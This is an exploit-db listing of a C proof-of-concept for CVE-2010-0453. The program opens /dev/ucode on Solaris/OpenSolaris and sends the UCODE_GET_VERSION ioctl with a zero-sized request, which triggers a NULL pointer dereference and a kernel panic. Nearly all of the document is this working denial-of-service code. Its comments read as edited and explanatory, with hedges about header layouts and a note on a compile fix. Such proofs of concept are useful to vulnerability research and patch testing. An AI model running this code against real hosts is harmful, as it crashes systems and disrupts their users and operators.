Solaris/OpenSolaris UCODE_GET_VERSION IOCTL – Denial of Service (kernel panic, CVE-2010-0453)

  • 作者: Patroklos Argyroudis
    日期: 2010-02-07
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/11351/
  • /*
     * cve-2010-0453.c -- Patroklos Argyroudis, argp at domain census-labs.com
     *
     * Denial of service (kernel panic) PoC exploit for the UCODE_GET_VERSION
     * ioctl NULL pointer dereference vulnerability on Solaris/OpenSolaris:
     *
     * http://www.trapkit.de/advisories/TKADV2010-001.txt
     * http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-0453
     *
     * Greets to Tobias Klein for discovering the vulnerability and for his
     * detailed (as always) advisory.
     *
     * $Id: cve-2010-0453.c,v 35da14215c84 2010/02/07 19:15:13 argp $
     */
    
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    #include <stropts.h>
    #include <sys/mman.h>
    #include <sys/types.h>
    #include <sys/stat.h>
    #include <fcntl.h>
    
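    /* Size of the user-side revision buffer, in uint32_t elements.  The PoC
     * sends the request with ugv_size = 0, so the array mainly exists to give
     * ugv_rev a valid user address.  (The extracted listing had the space
     * dropped -- "BUF_SIZE64" -- which made buf[BUF_SIZE] fail to compile.) */
    #define BUF_SIZE 64
    /* Character device node the ucode driver exposes. */
    #define UCODE_DEV "/dev/ucode"

    /*
     * ioctl numbers, reproduced here instead of pulling in the private
     * <sys/ucode.h>: 'u','c','o' packed into the top three bytes, command
     * index in the low byte.  If the target's header encodes them
     * differently the ioctl simply fails (see the printed ret) instead of
     * reaching the vulnerable path -- confirm against the target's
     * sys/ucode.h before concluding a host is not affected.
     */
    #define UCODE_IOC (('u' << 24) | ('c' << 16) | ('o' << 8))
    #define UCODE_GET_VERSION (UCODE_IOC | 0)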
    
    /*
     * Driver status codes, as reported back in ucode_get_rev_struct.ugv_errno
     * and printed by the PoC after the ioctl.  The sequence presumably mirrors
     * the ucode driver's own enum (confirm against the target's
     * <sys/ucode.h>); the values are spelled out here so a reordering cannot
     * silently shift them.
     */
    typedef enum ucode_errno {
        EM_OK         = 0,
        EM_FILESIZE   = 1,
        EM_OPENFILE   = 2,
        EM_FILEFORMAT = 3,
        EM_HEADER     = 4,
        EM_CHECKSUM   = 5,
        EM_INVALIDARG = 6,
        EM_NOMATCH    = 7,
        EM_HIGHERREV  = 8,
        EM_NOTSUP     = 9,
        EM_UPDATE     = 10,
        EM_SYS        = 11,
        EM_NOVENDOR   = 12,
        EM_NOMEM      = 13
    } ucode_errno_t;
    
    /*
     * Argument block for UCODE_GET_VERSION, copied into the PoC so it builds
     * without the private kernel header.  Field order and types are ABI:
     * they must match the driver's own definition (presumably in
     * <sys/ucode.h>) or the kernel interprets the block wrongly -- confirm
     * against the target's header.
     */
    struct ucode_get_rev_struct
    {
    uint32_t *ugv_rev;       /* user buffer for revision data; the PoC points it at a local array */
    int ugv_size;            /* element count behind ugv_rev; 0 is the trigger per the file header */
    ucode_errno_t ugv_errno; /* presumably filled in by the driver; the PoC prints it after the call */
    };
    
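    /*
     * PoC driver: open /dev/ucode and issue UCODE_GET_VERSION with a
     * zero-length revision request (ugv_size = 0).  Per the file header,
     * that size makes the kernel dereference a NULL pointer and panic, so
     * this is a denial of service -- run it only on a throwaway test host.
     * Whether an unprivileged user can open the device node decides who can
     * trigger it; the open() result below tells you that for the target.
     *
     * Returns the ioctl() result (0 on success, -1 on failure) so the exit
     * status matches the printed ret, or EXIT_FAILURE when the device node
     * cannot be opened at all.
     */
    int
    main(void)
    {
        int fd, ret;
        uint32_t buf[BUF_SIZE];
        /* Zero-initialised so the ugv_errno printed below is a defined value
         * even when the ioctl never reaches the driver. */
        struct ucode_get_rev_struct in_h = { 0 };

        /* Fill the whole array (sizeof buf, not BUF_SIZE bytes) so the marker
         * pattern is recognisable if it ever turns up in a crash dump. */
        memset(buf, 0x41, sizeof buf);

        in_h.ugv_rev = buf;
        in_h.ugv_size = 0;      /* the trigger: zero-sized request */

        fd = open(UCODE_DEV, O_RDONLY);
        if (fd < 0) {
            /* Without the node the ioctl would just fail with EBADF and the
             * PoC would misleadingly look like "not vulnerable". */
            perror("[-] open " UCODE_DEV);
            return EXIT_FAILURE;
        }

        ret = ioctl(fd, UCODE_GET_VERSION, &in_h);
        if (ret < 0)
            perror("[-] ioctl UCODE_GET_VERSION");

        printf("[+] ret = %d\n", ret);
        printf("[+] ugv_errno = %d\n", in_h.ugv_errno);

        close(fd);
        return ret;
    }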
    
    /* EOF */